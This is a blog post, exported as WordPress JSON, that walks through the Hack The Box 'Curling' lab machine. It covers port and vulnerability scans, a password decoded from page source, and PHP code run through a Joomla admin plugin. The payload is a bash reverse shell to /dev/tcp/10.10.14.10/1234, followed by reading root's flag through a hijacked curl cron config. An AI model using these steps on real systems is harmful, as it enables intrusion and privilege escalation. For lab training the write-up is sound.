{"id":3764,"date":"2020-08-28T22:59:34","date_gmt":"2020-08-28T13:59:34","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3764"},"modified":"2020-08-30T23:30:50","modified_gmt":"2020-08-30T14:30:50","slug":"hack-the-box-curling-walkthrough","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3764","title":{"rendered":"Hack The Box &#8211; Curling &#8211; Walkthrough"},"content":{"rendered":"<h3>Joomla version 3.8.8 is running<\/h3>\n<p><a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-24_004317.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-24_004317-300x261.png\" alt=\"\" width=\"300\" height=\"261\" class=\"alignnone size-medium wp-image-3765\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-24_004317-300x261.png 300w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-24_004317-1024x891.png 1024w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-24_004317-768x668.png 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-24_004317-1536x1336.png 1536w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-24_004317.png 1685w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# nmap -A -n -F -T5 curling.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-23 13:40 UTC\r\nNmap scan report for curling.htb (10.10.10.150)\r\nHost is up (0.041s latency).\r\nNot shown: 98 filtered ports\r\nPORT   STATE SERVICE VERSION\r\n22\/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)\r\n| ssh-hostkey:\r\n|   2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)\r\n|   256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)\r\n|_  256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)\r\n80\/tcp open  http    Apache httpd 2.4.29 
((Ubuntu))\r\n|_http-generator: Joomla! - Open Source Content Management\r\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\r\n|_http-title: Home\r\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\r\nOS fingerprint not ideal because: Timing level 5 (Insane) used\r\nNo OS matches for host\r\nNetwork Distance: 2 hops\r\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\r\n\r\n# nmap -T4 --script vuln curling.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-23 13:41 UTC\r\nWarning: 10.10.10.150 giving up on port because retransmission cap hit (6).\r\nNmap scan report for curling.htb (10.10.10.150)\r\nHost is up (0.055s latency).\r\nNot shown: 991 closed ports\r\nPORT      STATE    SERVICE\r\n22\/tcp    open     ssh\r\n|_clamav-exec: ERROR: Script execution failed (use -d to debug)\r\n80\/tcp    open     http\r\n|_clamav-exec: ERROR: Script execution failed (use -d to debug)\r\n| http-csrf:\r\n| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=curling.htb\r\n|   Found the following possible CSRF vulnerabilities:\r\n|\r\n|     Path: http:\/\/curling.htb:80\/\r\n|     Form id: login-form\r\n|     Form action: \/index.php\r\n|\r\n|     Path: http:\/\/curling.htb:80\/index.php\/component\/users\/?view=reset&amp;amp;Itemid=101\r\n|     Form id: user-registration\r\n|     Form action: \/index.php\/component\/users\/?task=reset.request&amp;Itemid=101\r\n|\r\n|     Path: http:\/\/curling.htb:80\/index.php\/component\/users\/?view=reset&amp;amp;Itemid=101\r\n|     Form id: login-form\r\n|     Form action: \/index.php\/component\/users\/?Itemid=101\r\n|\r\n|     Path: http:\/\/curling.htb:80\/index.php\r\n|     Form id: login-form\r\n|     Form action: \/index.php\r\n|\r\n|     Path: http:\/\/curling.htb:80\/index.php\/2-uncategorised\/2-curling-you-know-its-true\r\n|     Form id: login-form\r\n|     Form action: \/index.php\r\n|\r\n|     Path: 
http:\/\/curling.htb:80\/index.php\/2-uncategorised\r\n|     Form id: login-form\r\n|     Form action: \/index.php\r\n|\r\n|     Path: http:\/\/curling.htb:80\/index.php\/2-uncategorised\/1-first-post-of-curling2018\r\n|     Form id: login-form\r\n|_    Form action: \/index.php\r\n| http-dombased-xss:\r\n| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=curling.htb\r\n|   Found the following indications of potential DOM based XSS:\r\n|\r\n|     Source: window.open(this.href,'win2','status=no,toolbar=no,scrollbars=yes,titlebar=no,menubar=no,resizable=yes,width=640,height=480,directories=no,location=no')\r\n|_    Pages: http:\/\/curling.htb:80\/, http:\/\/curling.htb:80\/, http:\/\/curling.htb:80\/, http:\/\/curling.htb:80\/index.php, http:\/\/curling.htb:80\/index.php, http:\/\/curling.htb:80\/index.php, http:\/\/curling.htb:80\/index.php\/2-uncategorised\/2-curling-you-know-its-true, http:\/\/curling.htb:80\/index.php\/2-uncategorised, http:\/\/curling.htb:80\/index.php\/2-uncategorised, http:\/\/curling.htb:80\/index.php\/2-uncategorised, http:\/\/curling.htb:80\/index.php\/2-uncategorised\/1-first-post-of-curling2018\r\n| http-enum:\r\n|   \/administrator\/: Possible admin folder\r\n|   \/administrator\/index.php: Possible admin folder\r\n|   \/administrator\/manifests\/files\/joomla.xml: Joomla version 3.8.8\r\n|   \/language\/en-GB\/en-GB.xml: Joomla version 3.8.8\r\n|   \/htaccess.txt: Joomla!\r\n|   \/README.txt: Interesting, a readme.\r\n|   \/bin\/: Potentially interesting folder\r\n|   \/cache\/: Potentially interesting folder\r\n|   \/images\/: Potentially interesting folder\r\n|   \/includes\/: Potentially interesting folder\r\n|   \/libraries\/: Potentially interesting folder\r\n|   \/modules\/: Potentially interesting folder\r\n|   \/templates\/: Potentially interesting folder\r\n|_  \/tmp\/: Potentially interesting folder\r\n| http-internal-ip-disclosure:\r\n|_  Internal IP Leaked: 250\r\n|_http-stored-xss: Couldn't find any stored XSS 
vulnerabilities.\r\n1352\/tcp  filtered lotusnotes\r\n2383\/tcp  filtered ms-olap4\r\n3322\/tcp  filtered active-net\r\n4003\/tcp  filtered pxc-splr-ft\r\n4550\/tcp  filtered gds-adppiw-db\r\n6059\/tcp  filtered X11:59\r\n10243\/tcp filtered unknown\r\n\r\nNmap done: 1 IP address (1 host up) scanned in 185.92 seconds\r\n\r\n# perl nikto.pl -h http:\/\/curling.htb\/\r\n- Nikto v2.1.6\r\n---------------------------------------------------------------------------\r\n+ Target IP:          10.10.10.150\r\n+ Target Hostname:    curling.htb\r\n+ Target Port:        80\r\n+ Start Time:         2020-08-23 13:51:36 (GMT0)\r\n---------------------------------------------------------------------------\r\n+ Server: Apache\/2.4.29 (Ubuntu)\r\n+ The anti-clickjacking X-Frame-Options header is not present.\r\n+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS\r\n+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.\r\n+ Apache\/2.4.29 appears to be outdated (current is at least Apache\/2.4.43). Apache 2.2.34 is the EOL for the 2.x branch.\r\n+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.\r\n+ DEBUG HTTP verb may show server debugging information. 
See https:\/\/docs.microsoft.com\/en-us\/visualstudio\/debugger\/how-to-enable-debugging-for-aspnet-applications?view=vs-2017 for details.\r\n+ OSVDB-8193: \/index.php?module=ew_filemanager&amp;type=admin&amp;func=manager&amp;pathext=..\/..\/..\/etc: EW FileManager for PostNuke allows arbitrary file retrieval.\r\n+ OSVDB-3092: \/administrator\/: This might be interesting.\r\n+ OSVDB-3092: \/bin\/: This might be interesting.\r\n+ OSVDB-3092: \/includes\/: This might be interesting.\r\n+ OSVDB-3092: \/tmp\/: This might be interesting.\r\n+ OSVDB-3092: \/LICENSE.txt: License file found may identify site software.\r\n+ OSVDB-3233: \/icons\/README: Apache default file found.\r\n+ \/htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.\r\n+ \/administrator\/index.php: Admin login page\/section found.\r\n+ 8770 requests: 6 error(s) and 15 item(s) reported on remote host\r\n+ End Time:           2020-08-23 14:21:12 (GMT0) (1776 seconds)\r\n---------------------------------------------------------------------------\r\n+ 1 host(s) tested\r\n\r\n<\/pre>\n<h3>Check the source code<\/h3>\n<p>We can see that there is likely a user named floris.<br \/>\n<a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_202340.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_202340-300x219.png\" alt=\"\" width=\"300\" height=\"219\" class=\"alignnone size-medium wp-image-3766\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_202340-300x219.png 300w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_202340-1024x747.png 1024w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_202340-768x560.png 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_202340-1536x1120.png 1536w, 
https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_202340.png 1757w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Checking the source code reveals secret.txt.<br \/>\n<a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_202426.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_202426-267x300.png\" alt=\"\" width=\"267\" height=\"300\" class=\"alignnone size-medium wp-image-3767\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_202426-267x300.png 267w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_202426-912x1024.png 912w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_202426-768x862.png 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_202426-1368x1536.png 1368w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_202426.png 1481w\" sizes=\"(max-width: 267px) 100vw, 267px\" \/><\/a><br \/>\n<a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_202521.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_202521-300x116.png\" alt=\"\" width=\"300\" height=\"116\" class=\"alignnone size-medium wp-image-3768\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_202521-300x116.png 300w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_202521-768x297.png 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_202521.png 1004w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# echo Q3VybGluZzIwMTgh | base64 
-d\r\nCurling2018!\r\n<\/pre>\n<p>Log in to the administrator page as the user floris.<br \/>\n<a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_222308.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_222308-300x212.png\" alt=\"\" width=\"300\" height=\"212\" class=\"alignnone size-medium wp-image-3769\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_222308-300x212.png 300w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_222308-1024x725.png 1024w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_222308-768x544.png 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_222308.png 1508w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><br \/>\n<a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_222438.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_222438-300x187.png\" alt=\"\" width=\"300\" height=\"187\" class=\"alignnone size-medium wp-image-3770\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_222438-300x187.png 300w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_222438-1024x637.png 1024w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_222438-768x478.png 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_222438-1536x956.png 1536w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_222438-2048x1274.png 2048w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<h3>Execute PHP and gain privileges<\/h3>\n<p>Upload the <a href=\"https:\/\/www.regularlabs.com\/extensions\/sourcerer\">Sourcerer Place any code in 
Joomla!<\/a> plugin so that PHP can be executed.<br \/>\n<a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_224830.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_224830-300x225.png\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-3771\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_224830-300x225.png 300w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_224830-1024x767.png 1024w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_224830-768x575.png 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_224830-1536x1151.png 1536w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_224830-2048x1534.png 2048w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><br \/>\n<a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_225907.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_225907-300x201.png\" alt=\"\" width=\"300\" height=\"201\" class=\"alignnone size-medium wp-image-3772\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_225907-300x201.png 300w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_225907-1024x686.png 1024w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_225907-768x514.png 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_225907-1536x1029.png 1536w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-27_225907-2048x1372.png 2048w\" sizes=\"(max-width: 300px) 100vw, 300px\" 
\/><\/a><\/p>\n<p>Post the following content in Joomla.<\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n&lt;?php\r\nexec(&quot;\/bin\/bash -c 'bash -i &gt;&amp; \/dev\/tcp\/10.10.14.10\/1234 0&gt;&amp;1'&quot;);\r\n<\/pre>\n<p>Obtain the shell on Kali Linux.<\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# nc -lnvp 1234\r\nNcat: Version 7.80 ( https:\/\/nmap.org\/ncat )\r\nNcat: Listening on :::1234\r\nNcat: Listening on 0.0.0.0:1234\r\nNcat: Connection from 172.17.0.1.\r\nNcat: Connection from 172.17.0.1:60024.\r\nbash: cannot set terminal process group (1308): Inappropriate ioctl for device\r\nbash: no job control in this shell\r\n\r\nwww-data@curling:\/var\/www\/html$ id\r\nid\r\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n\r\nwww-data@curling:\/var\/www\/html$ cd \/home\/floris\r\ncd \/home\/floris\r\n\r\nwww-data@curling:\/home\/floris$ ls -alh\r\nls -alh\r\ntotal 44K\r\ndrwxr-xr-x 6 floris floris 4.0K May 22  2018 .\r\ndrwxr-xr-x 3 root   root   4.0K May 22  2018 ..\r\nlrwxrwxrwx 1 root   root      9 May 22  2018 .bash_history -&gt; \/dev\/null\r\n-rw-r--r-- 1 floris floris  220 Apr  4  2018 .bash_logout\r\n-rw-r--r-- 1 floris floris 3.7K Apr  4  2018 .bashrc\r\ndrwx------ 2 floris floris 4.0K May 22  2018 .cache\r\ndrwx------ 3 floris floris 4.0K May 22  2018 .gnupg\r\ndrwxrwxr-x 3 floris floris 4.0K May 22  2018 .local\r\n-rw-r--r-- 1 floris floris  807 Apr  4  2018 .profile\r\ndrwxr-x--- 2 root   floris 4.0K May 22  2018 admin-area\r\n-rw-r--r-- 1 floris floris 1.1K May 22  2018 password_backup\r\n-rw-r----- 1 floris floris   33 May 22  2018 user.txt\r\n\r\nwww-data@curling:\/home\/floris$ cat password_backup\r\ncat password_backup\r\n00000000: 425a 6839 3141 5926 5359 819b bb48 0000  BZh91AY&amp;SY...H..\r\n00000010: 17ff fffc 41cf 05f9 5029 6176 61cc 3a34  ....A...P)ava.:4\r\n00000020: 4edc cccc 6e11 5400 23ab 
4025 f802 1960  N...n.T.#.@%...`\r\n00000030: 2018 0ca0 0092 1c7a 8340 0000 0000 0000   ......z.@......\r\n00000040: 0680 6988 3468 6469 89a6 d439 ea68 c800  ..i.4hdi...9.h..\r\n00000050: 000f 51a0 0064 681a 069e a190 0000 0034  ..Q..dh........4\r\n00000060: 6900 0781 3501 6e18 c2d7 8c98 874a 13a0  i...5.n......J..\r\n00000070: 0868 ae19 c02a b0c1 7d79 2ec2 3c7e 9d78  .h...*..}y..&lt;~.x\r\n00000080: f53e 0809 f073 5654 c27a 4886 dfa2 e931  .&gt;...sVT.zH....1\r\n00000090: c856 921b 1221 3385 6046 a2dd c173 0d22  .V...!3.`F...s.&quot;\r\n000000a0: b996 6ed4 0cdb 8737 6a3a 58ea 6411 5290  ..n....7j:X.d.R.\r\n000000b0: ad6b b12f 0813 8120 8205 a5f5 2970 c503  .k.\/... ....)p..\r\n000000c0: 37db ab3b e000 ef85 f439 a414 8850 1843  7..;.....9...P.C\r\n000000d0: 8259 be50 0986 1e48 42d5 13ea 1c2a 098c  .Y.P...HB....*..\r\n000000e0: 8a47 ab1d 20a7 5540 72ff 1772 4538 5090  .G.. .U@r..rE8P.\r\n000000f0: 819b bb48                                ...H\r\n<\/pre>\n<h3>Work out the password from password_backup<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\nwww-data@curling:\/home\/floris$ xxd -r password_backup | file -\r\n\/dev\/stdin: bzip2 compressed data, block size = 900k\r\n\r\nwww-data@curling:\/home\/floris$ xxd -r password_backup | bzcat | file -\r\n\/dev\/stdin: gzip compressed data, was &quot;password&quot;, last modified: Tue May 22 19:16:20 2018, from Unix\r\n\r\nwww-data@curling:\/home\/floris$ xxd -r password_backup | bzcat | gzip -d | file -\r\n\/dev\/stdin: bzip2 compressed data, block size = 900k\r\n\r\nwww-data@curling:\/home\/floris$ xxd -r password_backup | bzcat | gzip -d | bzcat | file -\r\n\/dev\/stdin: POSIX tar archive (GNU)\r\n\r\nwww-data@curling:\/home\/floris$ xxd -r password_backup | bzcat | gzip -d | bzcat\r\npassword.txt                                                                                        0000644 0000000 0000000 00000000023 13301066143 012147  0                   
                                                                 ustar   root                            root\r\n5d&lt;wdCbdZu)|hChXll\r\n<\/pre>\n<h3>SSH in and get user.txt<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# ssh floris@curling.htb\r\nfloris@curling.htb's password:\r\nWelcome to Ubuntu 18.04 LTS (GNU\/Linux 4.15.0-22-generic x86_64)\r\n\r\n * Documentation:  https:\/\/help.ubuntu.com\r\n * Management:     https:\/\/landscape.canonical.com\r\n * Support:        https:\/\/ubuntu.com\/advantage\r\n\r\n  System information as of Thu Aug 27 14:40:54 UTC 2020\r\n\r\n  System load:  0.0               Processes:            167\r\n  Usage of \/:   46.2% of 9.78GB   Users logged in:      0\r\n  Memory usage: 22%               IP address for ens33: 10.10.10.150\r\n  Swap usage:   0%\r\n\r\n\r\n0 packages can be updated.\r\n0 updates are security updates.\r\n\r\n\r\nLast login: Mon May 28 17:00:48 2018 from 192.168.1.71\r\n\r\nfloris@curling:~$ id\r\nuid=1000(floris) gid=1004(floris) groups=1004(floris)\r\n\r\nfloris@curling:~$ cat user.txt\r\n65dd1df0713b40d88ead98cf11b8530b\r\n<\/pre>\n<h3>Get root.txt<\/h3>\n<p>Running <a href=\"https:\/\/github.com\/DominicBreuker\/pspy\">pspy<\/a> shows that cron is running.<\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\nfloris@curling:~$ .\/pspy64\r\npspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855\r\n\r\n\r\n     \u2588\u2588\u2593\u2588\u2588\u2588    \u2588\u2588\u2588\u2588\u2588\u2588  \u2588\u2588\u2593\u2588\u2588\u2588 \u2593\u2588\u2588   \u2588\u2588\u2593\r\n    \u2593\u2588\u2588\u2591  \u2588\u2588\u2592\u2592\u2588\u2588    \u2592 \u2593\u2588\u2588\u2591  \u2588\u2588\u2592\u2592\u2588\u2588  \u2588\u2588\u2592\r\n    \u2593\u2588\u2588\u2591 \u2588\u2588\u2593\u2592\u2591 
\u2593\u2588\u2588\u2584   \u2593\u2588\u2588\u2591 \u2588\u2588\u2593\u2592 \u2592\u2588\u2588 \u2588\u2588\u2591\r\n    \u2592\u2588\u2588\u2584\u2588\u2593\u2592 \u2592  \u2592   \u2588\u2588\u2592\u2592\u2588\u2588\u2584\u2588\u2593\u2592 \u2592 \u2591 \u2590\u2588\u2588\u2593\u2591\r\n    \u2592\u2588\u2588\u2592 \u2591  \u2591\u2592\u2588\u2588\u2588\u2588\u2588\u2588\u2592\u2592\u2592\u2588\u2588\u2592 \u2591  \u2591 \u2591 \u2588\u2588\u2592\u2593\u2591\r\n    \u2592\u2593\u2592\u2591 \u2591  \u2591\u2592 \u2592\u2593\u2592 \u2592 \u2591\u2592\u2593\u2592\u2591 \u2591  \u2591  \u2588\u2588\u2592\u2592\u2592\r\n    \u2591\u2592 \u2591     \u2591 \u2591\u2592  \u2591 \u2591\u2591\u2592 \u2591     \u2593\u2588\u2588 \u2591\u2592\u2591\r\n    \u2591\u2591       \u2591  \u2591  \u2591  \u2591\u2591       \u2592 \u2592 \u2591\u2591\r\n                   \u2591           \u2591 \u2591\r\n                               \u2591 \u2591\r\n\r\n...\r\n2020\/08\/28 13:49:01 CMD: UID=0    PID=2708   | \/usr\/sbin\/CRON -f\r\n2020\/08\/28 13:49:01 CMD: UID=0    PID=2707   | \/usr\/sbin\/CRON -f\r\n2020\/08\/28 13:49:01 CMD: UID=0    PID=2712   | curl -K \/home\/floris\/admin-area\/input -o \/home\/floris\/admin-area\/report\r\n2020\/08\/28 13:49:02 CMD: UID=???  
PID=2713   |\r\n2020\/08\/28 13:50:01 CMD: UID=0    PID=2719   | \/bin\/sh -c curl -K \/home\/floris\/admin-area\/input -o \/home\/floris\/admin-area\/report\r\n2020\/08\/28 13:50:01 CMD: UID=0    PID=2718   | \/bin\/sh -c curl -K \/home\/floris\/admin-area\/input -o \/home\/floris\/admin-area\/report\r\n2020\/08\/28 13:50:01 CMD: UID=0    PID=2717   | sleep 1\r\n2020\/08\/28 13:50:01 CMD: UID=0    PID=2716   | \/bin\/sh -c sleep 1; cat \/root\/default.txt &gt; \/home\/floris\/admin-area\/input\r\n...\r\n<\/pre>\n<p>This shows that the command is run by cron every minute and that input holds the options passed to curl, so rewrite input.<\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\nfloris@curling:~\/admin-area$ echo 'url = &quot;file:\/\/\/root\/root.txt&quot;' &gt; input\r\n\r\nfloris@curling:~\/admin-area$ cat input\r\nurl = &quot;file:\/\/\/root\/root.txt&quot;\r\n\r\nfloris@curling:~\/admin-area$ cat report\r\n82c198ab6fc5365fdc6da2ee5c26064a\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Joomla version 3.8.8 is running # nmap -A -n -F -T5 curling.htb Starting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-0 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[100,98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3764"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3764"}],"version-history":[{"count":6,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3764\/revisions"}],"predecessor-version":[{"id":3778,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3764\/revisions\/3778"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3764"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3764"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3764"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}